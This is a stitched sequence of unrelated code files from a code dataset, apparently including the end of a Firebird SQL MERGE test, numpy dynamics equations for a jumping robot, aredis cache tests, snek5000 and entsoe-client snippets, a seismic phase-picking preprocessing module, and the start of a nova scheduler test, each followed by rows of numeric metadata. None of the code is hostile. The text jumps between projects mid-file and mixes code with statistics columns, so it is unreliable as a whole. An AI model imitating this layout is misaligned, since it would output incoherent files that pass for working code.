when matched and s.id = 208 then update set t.x = t.x + s.x
when matched and s.id = 209 then update set t.x = t.x + s.x
when matched and s.id = 210 then update set t.x = t.x + s.x
when matched and s.id = 211 then update set t.x = t.x + s.x
when matched and s.id = 212 then update set t.x = t.x + s.x
when matched and s.id = 213 then update set t.x = t.x + s.x
when matched and s.id = 214 then update set t.x = t.x + s.x
when matched and s.id = 215 then update set t.x = t.x + s.x
when matched and s.id = 216 then update set t.x = t.x + s.x
when matched and s.id = 217 then update set t.x = t.x + s.x
when matched and s.id = 218 then update set t.x = t.x + s.x
when matched and s.id = 219 then update set t.x = t.x + s.x
when matched and s.id = 220 then update set t.x = t.x + s.x
when matched and s.id = 221 then update set t.x = t.x + s.x
when matched and s.id = 222 then update set t.x = t.x + s.x
when matched and s.id = 223 then update set t.x = t.x + s.x
when matched and s.id = 224 then update set t.x = t.x + s.x
when matched and s.id = 225 then update set t.x = t.x + s.x
when matched and s.id = 226 then update set t.x = t.x + s.x
when matched and s.id = 227 then update set t.x = t.x + s.x
when matched and s.id = 228 then update set t.x = t.x + s.x
when matched and s.id = 229 then update set t.x = t.x + s.x
when matched and s.id = 230 then update set t.x = t.x + s.x
when matched and s.id = 231 then update set t.x = t.x + s.x
when matched and s.id = 232 then update set t.x = t.x + s.x
when matched and s.id = 233 then update set t.x = t.x + s.x
when matched and s.id = 234 then update set t.x = t.x + s.x
when matched and s.id = 235 then update set t.x = t.x + s.x
when matched and s.id = 236 then update set t.x = t.x + s.x
when matched and s.id = 237 then update set t.x = t.x + s.x
when matched and s.id = 238 then update set t.x = t.x + s.x
when matched and s.id = 239 then update set t.x = t.x + s.x
when matched and s.id = 240 then update set t.x = t.x + s.x
when matched and s.id = 241 then update set t.x = t.x + s.x
when matched and s.id = 242 then update set t.x = t.x + s.x
when matched and s.id = 243 then update set t.x = t.x + s.x
when matched and s.id = 244 then update set t.x = t.x + s.x
when matched and s.id = 245 then update set t.x = t.x + s.x
when matched and s.id = 246 then update set t.x = t.x + s.x
when matched and s.id = 247 then update set t.x = t.x + s.x
when matched and s.id = 248 then update set t.x = t.x + s.x
when matched and s.id = 249 then update set t.x = t.x + s.x
when matched and s.id = 250 then update set t.x = t.x + s.x
when matched and s.id = 251 then update set t.x = t.x + s.x
when matched and s.id = 252 then update set t.x = t.x + s.x
when matched and s.id = 253 then update set t.x = t.x + s.x
when matched and s.id = 254 then update set t.x = t.x + s.x
;
rollback;
set count on;
select * from t;
set count off;
-- 2. Check correctness of results:
select * from tb;
merge into tb t
using ta s
on s.id = t.id
when matched and t.id < 2 then delete
when matched then update set t.x = t.x + s.x, t.y = t.y - s.y
when not matched and s.x < 250 then insert values(-s.id, s.x, s.y)
when not matched then insert values(s.id, s.x, s.y)
;
select * from tb;
rollback;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
Records affected: 0
ID X Y
============ ============ ============
1 10 11
4 40 44
5 50 55
ID X Y
============ ============ ============
4 440 -400
5 550 -500
-2 200 222
3 300 333
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_expected_stdout == act_1.clean_stdout
| 57.961965 | 120 | 0.623776 | 7,931 | 36,574 | 2.871895 | 0.047409 | 0.102208 | 0.246784 | 0.291083 | 0.954208 | 0.952145 | 0.891733 | 0.882162 | 0.877332 | 0.871361 | 0 | 0.054947 | 0.26404 | 36,574 | 630 | 121 | 58.053968 | 0.791247 | 0.007738 | 0 | 0.051495 | 0 | 0.853821 | 0.986549 | 0 | 0 | 0 | 0 | 0 | 0.001661 | 1 | 0.001661 | false | 0 | 0.003322 | 0 | 0.004983 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2db1b563aae1e4367831867fbd079310035b389f | 1,420 | py | Python | a_s.py | tsybulkin/jumper | 97bbac4be1871e65432e86e7f1e1234a1a75c5c4 | [
"BSD-2-Clause"
] | null | null | null | a_s.py | tsybulkin/jumper | 97bbac4be1871e65432e86e7f1e1234a1a75c5c4 | [
"BSD-2-Clause"
] | null | null | null | a_s.py | tsybulkin/jumper | 97bbac4be1871e65432e86e7f1e1234a1a75c5c4 | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
from numpy import sin, cos
from params import *
def get_c1(q, q_d, psi=0):
_,_,a,b,g = q
_,_,a_d,b_d,g_d = q_d
return np.array([
I1 + 2*L1**2*m1*sin(a + b + g)**2,
2*L1**2*m1*sin(a + b + g)**2 \
+ L1*L2*m1*sin(b + g)*sin(a + b + g) \
- L1*L2*m1*sin(a + b + g)*cos(b + g) \
+ L1*L3*m1*sin(a + b + g)*sin(b) \
- L1*L3*m1*sin(a + b + g)*cos(b),
2*L1**2*m1*sin(a + b + g)**2 \
+ L1*L2*m1*sin(b + g)*sin(a + b + g) \
- L1*L2*m1*sin(a + b + g)*cos(b + g)
])
def get_d1(q, q_d, psi=0):
_,_,a,b,g = q
_,_,a_d,b_d,g_d = q_d
return L1**2*m1*sin(2*a + 2*b + 2*g)*a_d**2 \
+ 2*L1**2*m1*sin(2*a + 2*b + 2*g)*a_d*b_d \
+ 2*L1**2*m1*sin(2*a + 2*b + 2*g)*a_d*g_d \
+ L1**2*m1*sin(2*a + 2*b + 2*g)*b_d**2 \
+ 2*L1**2*m1*sin(2*a + 2*b + 2*g)*b_d*g_d \
+ L1**2*m1*sin(2*a + 2*b + 2*g)*g_d**2 \
+ L1*L2*m1*sin(b + g)*sin(a + b + g)*b_d**2 \
+ 2*L1*L2*m1*sin(b + g)*sin(a + b + g)*b_d*g_d \
+ L1*L2*m1*sin(b + g)*sin(a + b + g)*g_d**2 \
+ L1*L2*m1*sin(a + b + g)*cos(b + g)*b_d**2 \
+ 2*L1*L2*m1*sin(a + b + g)*cos(b + g)*b_d*g_d \
+ L1*L2*m1*sin(a + b + g)*cos(b + g)*g_d**2 \
+ L1*L3*m1*sin(a + b + g)*sin(b)*b_d**2 \
+ L1*L3*m1*sin(a + b + g)*cos(b)*b_d**2 \
- L1*Grav*m1*sin(a + b + g) \
+ dz*k1*z1*sin(a) - dz*k2*z2*sin(a) \
+ k1*z0*z1*sin(psi)*sin(a) - k1*z1**2*sin(2*a)/2 \
+ k2*z0*z2*sin(psi)*sin(a) - k2*z2**2*sin(2*a)/2 \
+ miu_a*a_d
| 27.843137 | 52 | 0.472535 | 381 | 1,420 | 1.653543 | 0.091864 | 0.095238 | 0.095238 | 0.171429 | 0.763492 | 0.719048 | 0.71746 | 0.71746 | 0.711111 | 0.58254 | 0 | 0.121267 | 0.221831 | 1,420 | 50 | 53 | 28.4 | 0.448869 | 0 | 0 | 0.205128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.076923 | 0 | 0.179487 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2dc4372f8cb814666e75d40b47175082dc94d160 | 7,709 | py | Python | tests/client/test_cache.py | eoghanmurray/aredis | e0ddfea1c6e21219aca9f67b10160bc380540fbf | [
"MIT"
] | 1 | 2018-11-28T22:49:56.000Z | 2018-11-28T22:49:56.000Z | tests/client/test_cache.py | eoghanmurray/aredis | e0ddfea1c6e21219aca9f67b10160bc380540fbf | [
"MIT"
] | null | null | null | tests/client/test_cache.py | eoghanmurray/aredis | e0ddfea1c6e21219aca9f67b10160bc380540fbf | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import asyncio
import pytest
import time
from aredis.cache import Cache, HerdCache
class TestCache(object):
app = 'test_cache'
key = 'test_key'
data = {str(i): i for i in range(3)}
def expensive_work(self, data):
return data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set(self, r):
await r.flushdb()
cache = Cache(r, self.app)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data)
assert res
identity = cache._gen_identity(self.key, self.data)
content = await r.get(identity)
content = cache._unpack(content)
assert content == self.data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set_timeout(self, r, event_loop):
await r.flushdb()
cache = Cache(r, self.app)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data, expire_time=1)
assert res
identity = cache._gen_identity(self.key, self.data)
content = await r.get(identity)
content = cache._unpack(content)
assert content == self.data
await asyncio.sleep(1, loop=event_loop)
content = await r.get(identity)
assert content is None
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set_with_plain_key(self, r):
await r.flushdb()
cache = Cache(r, self.app, identity_generator_class=None)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data, expire_time=1)
assert res
identity = cache._gen_identity(self.key, self.data)
assert identity == self.key
content = await r.get(identity)
content = cache._unpack(content)
assert content == self.data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_get(self, r):
await r.flushdb()
cache = Cache(r, self.app)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data, expire_time=1)
assert res
content = await cache.get(self.key, self.data)
assert content == self.data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set_many(self, r):
await r.flushdb()
cache = Cache(r, self.app)
res = await cache.set_many(self.expensive_work(self.data),
self.data)
assert res
for key, value in self.data.items():
assert await cache.get(key, self.data) == value
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_delete(self, r):
await r.flushdb()
cache = Cache(r, self.app)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data, expire_time=1)
assert res
content = await cache.get(self.key, self.data)
assert content == self.data
res = await cache.delete(self.key, self.data)
assert res
content = await cache.get(self.key, self.data)
assert content is None
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_delete_pattern(self, r):
await r.flushdb()
cache = Cache(r, self.app)
await cache.set_many(self.expensive_work(self.data),
self.data)
res = await cache.delete_pattern('test_*', 10)
assert res == 3
content = await cache.get(self.key, self.data)
assert content is None
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_ttl(self, r, event_loop):
await r.flushdb()
cache = Cache(r, self.app)
await cache.set(self.key, self.expensive_work(self.data),
self.data, expire_time=1)
ttl = await cache.ttl(self.key, self.data)
assert ttl > 0
await asyncio.sleep(1.1, loop=event_loop)
ttl = await cache.ttl(self.key, self.data)
assert ttl < 0
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_exists(self, r, event_loop):
await r.flushdb()
cache = Cache(r, self.app)
await cache.set(self.key, self.expensive_work(self.data),
self.data, expire_time=1)
exists = await cache.exist(self.key, self.data)
assert exists is True
await asyncio.sleep(1.1, loop=event_loop)
exists = await cache.exist(self.key, self.data)
assert exists is False
class TestHerdCache(object):
app = 'test_cache'
key = 'test_key'
data = {str(i): i for i in range(3)}
def expensive_work(self, data):
return data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set(self, r):
await r.flushdb()
cache = HerdCache(r, self.app, default_herd_timeout=1,
extend_herd_timeout=1)
now = int(time.time())
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data)
assert res
identity = cache._gen_identity(self.key, self.data)
content = await r.get(identity)
content, expect_expire_time = cache._unpack(content)
# supposed equal to 1, but may there be latency
assert expect_expire_time - now <= 1
assert content == self.data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_get(self, r):
await r.flushdb()
cache = HerdCache(r, self.app, default_herd_timeout=1,
extend_herd_timeout=1)
res = await cache.set(self.key,
self.expensive_work(self.data),
self.data)
assert res
content = await cache.get(self.key, self.data)
assert content == self.data
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_set_many(self, r):
await r.flushdb()
cache = HerdCache(r, self.app, default_herd_timeout=1,
extend_herd_timeout=1)
res = await cache.set_many(self.expensive_work(self.data),
self.data)
assert res
for key, value in self.data.items():
assert await cache.get(key, self.data) == value
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_herd(self, r, event_loop):
await r.flushdb()
now = int(time.time())
cache = HerdCache(r, self.app, default_herd_timeout=1,
extend_herd_timeout=1)
await cache.set(self.key,
self.expensive_work(self.data),
self.data)
await asyncio.sleep(1, loop=event_loop)
# first get
identity = cache._gen_identity(self.key, self.data)
content = await r.get(identity)
content, expect_expire_time = cache._unpack(content)
assert now + 1 == expect_expire_time
# HerdCach.get
await asyncio.sleep(0.1, loop=event_loop)
res = await cache.get(self.key, self.data)
# first herd get will reset expire time and return None
assert res is None
# second get
identity = cache._gen_identity(self.key, self.data)
content = await r.get(identity)
content, new_expire_time = cache._unpack(content)
assert new_expire_time >= expect_expire_time + 1
| 36.885167 | 66 | 0.585809 | 989 | 7,709 | 4.429727 | 0.093023 | 0.10226 | 0.067793 | 0.058206 | 0.887012 | 0.878567 | 0.860762 | 0.848208 | 0.8336 | 0.819448 | 0 | 0.006439 | 0.315086 | 7,709 | 208 | 67 | 37.0625 | 0.823295 | 0.022312 | 0 | 0.825843 | 0 | 0 | 0.005578 | 0 | 0 | 0 | 0 | 0 | 0.179775 | 1 | 0.011236 | false | 0 | 0.022472 | 0.011236 | 0.089888 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2df4c13a4469278a51bbca0a42d88fc610fcccc4 | 193 | py | Python | tests/test_resources.py | akhoubani/snek5000 | f809de31de711c922344d05311d412a3901c8f18 | [
"BSD-3-Clause"
] | 11 | 2020-05-09T09:35:32.000Z | 2022-01-10T20:05:12.000Z | tests/test_resources.py | akhoubani/snek5000 | f809de31de711c922344d05311d412a3901c8f18 | [
"BSD-3-Clause"
] | 115 | 2020-05-09T16:56:07.000Z | 2022-02-01T00:46:58.000Z | tests/test_resources.py | akhoubani/snek5000 | f809de31de711c922344d05311d412a3901c8f18 | [
"BSD-3-Clause"
] | 2 | 2020-09-03T13:48:40.000Z | 2021-10-13T14:51:59.000Z | import snek5000
def test_nek5000():
assert snek5000.source_root()
def test_asset():
assert snek5000.get_asset("nek5000.smk")
assert snek5000.get_asset("default_configfile.yml")
| 17.545455 | 55 | 0.746114 | 25 | 193 | 5.52 | 0.56 | 0.304348 | 0.246377 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 0.145078 | 193 | 10 | 56 | 19.3 | 0.690909 | 0 | 0 | 0 | 0 | 0 | 0.170984 | 0.11399 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.333333 | true | 0 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
93339444ea3c7255cddc46b4a8a2ddb1b8a96ea7 | 318 | py | Python | entsoe_client/Queries/__init__.py | DarioHett/entsoe-client | bb424fa54966d3be49daa1edb9e0fd40ed00ac15 | [
"MIT"
] | 1 | 2021-10-03T18:11:57.000Z | 2021-10-03T18:11:57.000Z | entsoe_client/Queries/__init__.py | DarioHett/entsoe-client | bb424fa54966d3be49daa1edb9e0fd40ed00ac15 | [
"MIT"
] | 1 | 2021-11-08T16:54:10.000Z | 2021-11-08T16:54:10.000Z | entsoe_client/Queries/__init__.py | DarioHett/entsoe-client | bb424fa54966d3be49daa1edb9e0fd40ed00ac15 | [
"MIT"
] | 1 | 2021-12-04T21:24:53.000Z | 2021-12-04T21:24:53.000Z | from entsoe_client.Queries.Query import Query
import entsoe_client.Queries.Load
import entsoe_client.Queries.Transmission
import entsoe_client.Queries.Congestion
import entsoe_client.Queries.MasterData
import entsoe_client.Queries.Generation
import entsoe_client.Queries.Balancing
import entsoe_client.Queries.Outages
| 35.333333 | 45 | 0.893082 | 42 | 318 | 6.571429 | 0.309524 | 0.347826 | 0.550725 | 0.634058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056604 | 318 | 8 | 46 | 39.75 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
93432da457153b38ce2545c4826c1cf9105ad857 | 10,517 | py | Python | src/S_EqT_codes/src/data_preprocessing.py | MrXiaoXiao/ESPRH | c4bbebba001523fbd86f9de4b09cb931665b7a71 | [
"MIT"
] | 7 | 2021-12-02T03:26:08.000Z | 2022-03-01T04:26:02.000Z | src/S_EqT_codes/src/data_preprocessing.py | Damin1909/ESPRH | 2b26a7e698fe7c411d44ce5f51d52fffdb742d48 | [
"MIT"
] | 5 | 2021-12-04T17:00:03.000Z | 2022-03-17T04:02:11.000Z | src/S_EqT_codes/src/data_preprocessing.py | Damin1909/ESPRH | 2b26a7e698fe7c411d44ce5f51d52fffdb742d48 | [
"MIT"
] | 3 | 2021-12-02T01:38:29.000Z | 2021-12-02T05:37:47.000Z | import numpy as np
import os
def build_phase_dict_from_EqT(cfgs, wavetype='P'):
station_list = list()
phase_dict = dict()
station_list_file = open(cfgs['REAL']['save_sta'],'r')
sta_id = 0
for line in station_list_file.readlines():
if len(line) < 3:
continue
splits = line.split(' ')
sta_name = splits[2]+'.'+splits[3]
phase_dict[sta_name] = dict()
phase_dict[sta_name]['P'] = list()
phase_dict[sta_name]['S'] = list()
phase_dict[sta_name]['P_Prob'] = list()
phase_dict[sta_name]['S_Prob'] = list()
sta_lat = float(splits[1])
sta_lon = float(splits[0])
station_list.append( (sta_id, sta_name, sta_lat, sta_lon) )
sta_id += 1
for sta_key in phase_dict.keys():
pick_times = list()
pick_probs = list()
prev_file = cfgs['EqT']['txt_folder'] + '{}.{}.txt'.format(sta_key,wavetype)
if os.path.exists(prev_file):
f = open(prev_file,'r')
for line in f.readlines():
if len(line) > 3:
pick_times.append(float(line.split(' ')[0]))
pick_probs.append(float(line.split(' ')[1]))
f.close()
else:
print('Empty' + prev_file)
phase_dict[sta_key]['{}'.format(wavetype)] = pick_times
phase_dict[sta_key]['{}_Prob'.format(wavetype)] = pick_probs
return phase_dict, station_list
def build_phase_dict(sta_file_name, res_folder_name, wavetype='P'):
station_list = list()
phase_dict = dict()
station_list_file = open(sta_file_name,'r')
sta_id = 0
for line in station_list_file.readlines():
if len(line) < 3:
continue
splits = line.split(' ')
sta_name = splits[2]+'.'+splits[3]
phase_dict[sta_name] = dict()
phase_dict[sta_name]['P'] = list()
phase_dict[sta_name]['S'] = list()
phase_dict[sta_name]['P_amp'] = list()
phase_dict[sta_name]['P_Prob'] = list()
phase_dict[sta_name]['S_amp'] = list()
phase_dict[sta_name]['S_Prob'] = list()
sta_lat = float(splits[1])
sta_lon = float(splits[0])
station_list.append( (sta_id, sta_name, sta_lat, sta_lon) )
sta_id += 1
for sta_key in phase_dict.keys():
pick_times = list()
pick_probs = list()
prev_file = res_folder_name + '/' + '{}.{}.txt'.format(sta_key,wavetype)
if os.path.exists(prev_file):
f = open(prev_file,'r')
for line in f.readlines():
if len(line) > 3:
pick_times.append(float(line.split(' ')[0]))
pick_probs.append(float(line.split(' ')[1]))
f.close()
else:
print('Missing ' + prev_file)
phase_dict[sta_key]['{}'.format(wavetype)] = pick_times
phase_dict[sta_key]['{}_Prob'.format(wavetype)] = pick_probs
return phase_dict, station_list
def normalize_by_std(data_in):
"""
std normalization
"""
data_in -= np.mean(data_in, axis=0 ,keepdims=True)
t_std = np.std(data_in, axis = 0, keepdims=True)
t_std[t_std == 0] = 1.0
data_in /= t_std
return data_in
def get_response_list_for_vis(cfgs, spt_t_eqt, sst_t_eqt, encoded_t, encoded_s):
RSRN_lengths = cfgs['Model']['RSRN_Encoded_lengths']
RSRN_channels = cfgs['Model']['RSRN_Encoded_channels']
#encoder_encoded_list = cfgs['Model']['Encoder_concate_list']
#encoder_encoded_lengths = cfgs['Model']['Encoder_concate_lengths']
#encoder_encoded_channels = cfgs['Model']['Encoder_concate_channels']
ori_response_list_for_vis = list()
enhanced_response_list_for_vis = list()
t_spt_t = float(spt_t_eqt/6000.0)
t_sst_t = float(sst_t_eqt/6000.0)
for rdx in range(len(RSRN_lengths)):
temp_length = float(RSRN_lengths[rdx])
template_s = int(t_spt_t*temp_length) - 1
template_e = int(t_sst_t*temp_length) + 1
template_w = int(template_e - template_s)
encoded_t[rdx] = encoded_t[rdx][:,template_s:template_e,:]/float(template_w)
encoded_t[rdx] = encoded_t[rdx].reshape([1,template_w,1,int(RSRN_channels[rdx])])
encoded_s[rdx] = encoded_s[rdx].reshape([1,int(RSRN_lengths[rdx]),1,int(RSRN_channels[rdx])])
ori_response_list_for_vis.append(np.copy(encoded_t[rdx]))
ori_response_list_for_vis.append(np.copy(encoded_s[rdx]))
# channel-wise normalization
for channel_dx in range(int(RSRN_channels[rdx])):
encoded_s[rdx][0,:,0,channel_dx] -= np.max(encoded_s[rdx][0,:,0,channel_dx])
half_window_len = int( 200.0*temp_length/6000.0 ) + 1
encoded_s[rdx][0,:half_window_len,0,channel_dx] = encoded_s[rdx][0,half_window_len,0,channel_dx]
encoded_s[rdx][0,-half_window_len:,0,channel_dx] = encoded_s[rdx][0,-half_window_len,0,channel_dx]
encoded_s[rdx][0,:,0,channel_dx] *= -1.0
encoded_s[rdx][0,:,0,channel_dx] -= np.mean(encoded_s[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_s[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_s[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] -= np.max(encoded_t[rdx][0,:,0,channel_dx])
encoded_t[rdx][0,:,0,channel_dx] *= -1.0
encoded_t[rdx][0,:,0,channel_dx] -= np.mean(encoded_t[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_t[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_t[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] /= float(template_w)
enhanced_response_list_for_vis.append(encoded_t[rdx])
enhanced_response_list_for_vis.append(encoded_s[rdx])
return ori_response_list_for_vis, enhanced_response_list_for_vis
def get_siamese_input_list(cfgs, spt_t_eqt, sst_t_eqt, encoded_t, encoded_s):
RSRN_lengths = cfgs['Model']['RSRN_Encoded_lengths']
RSRN_channels = cfgs['Model']['RSRN_Encoded_channels']
encoder_encoded_list = cfgs['Model']['Encoder_concate_list']
encoder_encoded_lengths = cfgs['Model']['Encoder_concate_lengths']
encoder_encoded_channels = cfgs['Model']['Encoder_concate_channels']
siamese_input_list = list()
t_spt_t = float(spt_t_eqt/6000.0)
t_sst_t = float(sst_t_eqt/6000.0)
for rdx in range(len(RSRN_lengths)):
temp_length = float(RSRN_lengths[rdx])
template_s = int(t_spt_t*temp_length) - 1
template_e = int(t_sst_t*temp_length) + 1
template_w = int(template_e - template_s)
encoded_t[rdx] = encoded_t[rdx][:,template_s:template_e,:]/float(template_w)
encoded_t[rdx] = encoded_t[rdx].reshape([1,template_w,1,int(RSRN_channels[rdx])])
encoded_s[rdx] = encoded_s[rdx].reshape([1,int(RSRN_lengths[rdx]),1,int(RSRN_channels[rdx])])
# channel-wise normalization
for channel_dx in range(int(RSRN_channels[rdx])):
encoded_s[rdx][0,:,0,channel_dx] -= np.max(encoded_s[rdx][0,:,0,channel_dx])
half_window_len = int( 200.0*temp_length/6000.0 ) + 1
encoded_s[rdx][0,:half_window_len,0,channel_dx] = encoded_s[rdx][0,half_window_len,0,channel_dx]
encoded_s[rdx][0,-half_window_len:,0,channel_dx] = encoded_s[rdx][0,-half_window_len,0,channel_dx]
encoded_s[rdx][0,:,0,channel_dx] *= -1.0
encoded_s[rdx][0,:,0,channel_dx] -= np.mean(encoded_s[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_s[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_s[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] -= np.max(encoded_t[rdx][0,:,0,channel_dx])
encoded_t[rdx][0,:,0,channel_dx] *= -1.0
encoded_t[rdx][0,:,0,channel_dx] -= np.mean(encoded_t[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_t[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_t[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] /= float(template_w)
siamese_input_list.append(encoded_t[rdx])
siamese_input_list.append(encoded_s[rdx])
for rdx in range(len(RSRN_lengths), len(RSRN_lengths) + len(encoder_encoded_list)):
rdx_2 = rdx - len(RSRN_lengths)
temp_length = float(encoder_encoded_lengths[rdx_2])
template_s = int(t_spt_t*temp_length) - 1
template_e = int(t_sst_t*temp_length) + 1
template_w = int(template_e - template_s)
encoded_t[rdx] = encoded_t[rdx][:,template_s:template_e,:]/float(template_w)
encoded_t[rdx] = encoded_t[rdx].reshape([1,template_w,1,int(encoder_encoded_channels[rdx_2])])
encoded_s[rdx] = encoded_s[rdx].reshape([1,int(encoder_encoded_lengths[rdx_2]),1,int(encoder_encoded_channels[rdx_2])])
# channel normalization
for channel_dx in range(int(encoder_encoded_channels[rdx_2])):
encoded_s[rdx][0,:,0,channel_dx] -= np.max(encoded_s[rdx][0,:,0,channel_dx])
half_window_len = int( 200.0*temp_length/6000.0 ) + 1
encoded_s[rdx][0,:half_window_len,0,channel_dx] = encoded_s[rdx][0,half_window_len,0,channel_dx]
encoded_s[rdx][0,-half_window_len:,0,channel_dx] = encoded_s[rdx][0,-half_window_len,0,channel_dx]
encoded_s[rdx][0,:,0,channel_dx] *= -1.0
encoded_s[rdx][0,:,0,channel_dx] -= np.mean(encoded_s[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_s[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_s[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] -= np.max(encoded_t[rdx][0,:,0,channel_dx])
encoded_t[rdx][0,:,0,channel_dx] *= -1.0
encoded_t[rdx][0,:,0,channel_dx] -= np.mean(encoded_t[rdx][0,:,0,channel_dx])
t_max = np.max(np.abs(encoded_t[rdx][0,:,0,channel_dx]))
if t_max < 0.001:
t_max = 1
encoded_t[rdx][0,:,0,channel_dx] /= t_max
encoded_t[rdx][0,:,0,channel_dx] /= float(template_w)
siamese_input_list.append(encoded_t[rdx])
siamese_input_list.append(encoded_s[rdx])
return siamese_input_list | 43.102459 | 127 | 0.611676 | 1,603 | 10,517 | 3.683094 | 0.067998 | 0.091463 | 0.096545 | 0.091463 | 0.937161 | 0.909383 | 0.903455 | 0.875169 | 0.866023 | 0.851118 | 0 | 0.031764 | 0.236664 | 10,517 | 244 | 128 | 43.102459 | 0.703662 | 0.027384 | 0 | 0.797872 | 0 | 0 | 0.030463 | 0.008718 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026596 | false | 0 | 0.010638 | 0 | 0.06383 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fad726b2931c249e03c3576e8ca18cd47ae4df7f | 17,610 | py | Python | nova/tests/unit/scheduler/filters/test_bigvm_filters.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/scheduler/filters/test_bigvm_filters.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/scheduler/filters/test_bigvm_filters.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import mock
import nova.conf
from nova import objects
from nova.scheduler.filters import bigvm_filter
from nova import test
from nova.tests.unit.scheduler import fakes
from nova.tests import uuidsentinel
CONF = nova.conf.CONF
@mock.patch('nova.scheduler.client.report.'
'SchedulerReportClient._get_inventory')
class TestBigVmBaseFilter(test.NoDBTestCase):
def setUp(self):
